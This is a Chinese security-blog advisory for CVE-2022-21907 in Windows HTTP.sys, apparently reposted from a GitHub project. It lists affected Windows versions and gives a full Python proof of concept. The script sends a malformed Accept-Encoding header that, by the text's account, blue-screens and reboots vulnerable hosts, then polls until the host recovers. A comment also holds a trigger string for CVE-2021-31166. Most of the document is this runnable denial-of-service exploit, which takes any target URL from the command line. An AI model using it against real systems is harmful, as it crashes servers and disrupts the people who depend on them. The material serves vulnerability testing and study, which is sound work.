【CVE-2022-21907】Microsoft Windows HTTP Protocol Stack (HTTP.sys) 安全漏洞
作者:Sec-Labs | 发布时间:
项目地址
https://github.com/Malwareman007/CVE-2022-21907
漏洞分享
Microsoft Windows是美国微软(Microsoft)公司的一套个人设备使用的操作系统。
Microsoft Windows HTTP Protocol Stack（HTTP.sys）存在安全漏洞：未经身份验证的远程攻击者只需向目标发送一个携带畸形 Accept-Encoding 请求头的普通 HTTP 请求即可触发。下文 POC 仅演示其拒绝服务效果（目标主机蓝屏并重启），已安装补丁的主机会正常响应该请求、不受影响。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows 10 Version 1809 for ARM64-based Systems,Windows Server 2019,Windows Server 2019 (Server Core installation),Windows 10 Version 20H2 for ARM64-based Systems,Windows Server, version 20H2 (Server Core Installation),Windows 11 for x64-based Systems,Windows 11 for ARM64-based Systems,Windows 10 Version 21H2 for 32-bit Systems,Windows 10 Version 21H2 for ARM64-based Systems,Windows 10 Version 21H2 for x64-based Systems,Windows 10 Version 21H1 for ARM64-based Systems,Windows 10 Version 21H1 for 32-bit Systems,Windows Server 2022,Windows Server 2022 (Server Core installation),Windows 10 Version 20H2 for x64-based Systems,Windows 10 Version 20H2 for 32-bit Systems,Windows 10 Version 21H1 for x64-based Systems
漏洞POC（注意：以下 POC 属于破坏性测试，成功触发会使目标主机蓝屏重启，只能在已获得明确授权的测试环境中运行，切勿对生产系统使用）
import requests
from loguru import logger
import time
# Browser-like User-Agent used by the liveness probes (it is not part of the trigger).
header = {
    'User-Agent': (
        'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 '
        '(KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36'
    ),
}
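class CVE_2022_21907():
    """Crash-based checker for CVE-2022-21907 (Windows HTTP Protocol Stack).

    WARNING: this is a destructive test. ``poc`` sends a malformed
    ``Accept-Encoding`` header; on a vulnerable host the HTTP stack stops
    answering and the machine blue-screens and reboots. Only run it against
    systems you are explicitly authorised to crash, never against production.

    Flow (see ``dia``): liveness probe -> send trigger -> wait for the host to
    disappear and come back -> report. Every request is a plain HTTP GET with
    a 10 second timeout and the module-level ``header`` User-Agent.
    """

    @logger.catch(level='ERROR')
    def first_handshake(self, target: str) -> bool:
        """Liveness probe: return True only if ``target`` answers HTTP 200.

        Any other status code, or any requests error (unreachable, timeout,
        malformed URL), is logged and returns False. NOTE: a live HTTP stack
        that answers 403/404 is therefore also treated as "not testable";
        that is the original tool's choice and is kept here.
        """
        try:
            resp = requests.get(target, headers=header, timeout=10)
        except requests.exceptions.RequestException as e:
            logger.info(f'First handshake error: The target host is abnormal, please check whether the target host is alive, error resp: {e}')
            return False
        if resp.status_code == 200:
            logger.info('The first handshake: the target host is normal and can be verified by POC')
            return True
        logger.info(f'First handshake: the target host is normal, but returns an exception, status code: {resp.status_code}')
        return False

    @logger.catch(level='ERROR')
    def verify_handshake(self, target: str) -> bool:
        """Post-trigger probe: True while the host is still down, False once it answers.

        A connection error is the expected state while a crashed host reboots.
        A timeout (reachable but not answering) is also reported as "still
        down" instead of escaping to the decorator, which would have returned
        None and been mistaken for "host is back". Any HTTP response, whatever
        its status, means the host has recovered.
        """
        try:
            resp = requests.get(target, headers=header, timeout=10)
        except requests.exceptions.ConnectionError:
            logger.info('Verification result: The verification is successful, the target host is abnormal, has been exploited and entered the blue screen restart')
            return True
        except requests.exceptions.RequestException as e:
            logger.info(f'Verification result: the target host is reachable but not answering ({type(e).__name__}), still waiting')
            return True
        if resp.status_code == 200:
            logger.info('Verification result: The target host has restarted and returned to normal')
            return False
        logger.info(f'Verification result: The target host has restarted and returned to normal, but returned an exception with a status code: {resp.status_code}')
        return False

    @logger.catch(level='ERROR')
    def poc(self, target: str) -> bool:
        """Send the CVE-2022-21907 trigger; True if the host stopped answering.

        The malformed ``Accept-Encoding`` value below is the trigger. On a
        vulnerable host the request never gets a reply (read timeout) because
        the kernel crashes -> True. A normal reply means the header was parsed
        fine, i.e. the host is most likely patched -> False. Any other
        transport error (connection refused/reset, bad URL) means the trigger
        could not be delivered and is reported as False rather than as a hit.
        """
        # headers = {'Accept-Encoding': 'doar-e, ftw, imo, ,'} # CVE-2021-31166
        headers = {
            'Accept-Encoding': 'AAAAAAAAAAAAAAAAAAAAAAAA, '
            'BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S, '
            'RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF, '
            'TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP, '
            'OOOAOAOOOAOOAOOOAOOOAOOOAOO, '
            '****************************stupiD, *, ,'
        }  # CVE-2022-21907
        try:
            requests.get(target, headers=headers, timeout=10)
        except requests.exceptions.ReadTimeout:
            logger.info(f'POC handshake success: {target} maybe can Exploit!')
            return True
        except requests.exceptions.RequestException as e:
            logger.info(f'POC handshake inconclusive: could not deliver the trigger to {target} ({type(e).__name__}: {e})')
            return False
        logger.info(f'POC handshake failed: {target} does not exist CVE-2022-21907 Vulnerability, may have been patched')
        return False

    @logger.catch(level='ERROR')
    def dia(self, url: str, *, poll_interval: float = 10, max_wait: float = 600) -> None:
        """Run the whole check against ``url`` and log the verdict.

        Args:
            url: host, ``host:port`` or full URL. A missing scheme becomes
                ``http://``; an ``https://`` scheme is downgraded to
                ``http://`` (scheme only, the path is left alone), as the
                original tool did.
            poll_interval: seconds between recovery probes after the trigger.
            max_wait: upper bound, in seconds, on how long to wait for the
                host to come back; the original looped forever.

        The "vulnerable" verdict is only logged when the trigger actually
        timed out; previously it was printed unconditionally, which reported
        patched hosts as vulnerable.
        """
        # Exact-prefix checks: the old substring test ('https' in url) would
        # also rewrite an "https" that appears in the path or query.
        if url.startswith('https://'):
            target = 'http://' + url[len('https://'):]
        elif url.startswith('http://'):
            target = url
        else:
            target = f'http://{url}'
        logger.info(f'start verification: {target}')
        if not self.first_handshake(target):
            logger.info(f'{target} does not exist CVE-2022-21907 Vulnerability')
            return
        if not self.poc(target):
            # poc() already logged why (patched, or trigger not delivered).
            return
        logger.info('Deterministic verification again')
        deadline = time.monotonic() + max_wait
        while True:
            time.sleep(poll_interval)
            if not self.verify_handshake(target):
                break
            if time.monotonic() >= deadline:
                logger.info(f'{target} has not come back within {max_wait} seconds; the trigger timed out, but confirm the crash manually')
                break
        logger.info(f'{target} have CVE-2022-21907 vulnerability, can be exploited!')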
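if __name__ == '__main__':
    import sys

    # Target comes from the first command-line argument; the original
    # hard-coded loopback URL is kept as the fallback so existing usage is
    # unchanged. A successful run crashes the target (blue screen + reboot):
    # point this only at systems you are authorised to test.
    cve = CVE_2022_21907()
    cve.dia(sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1/")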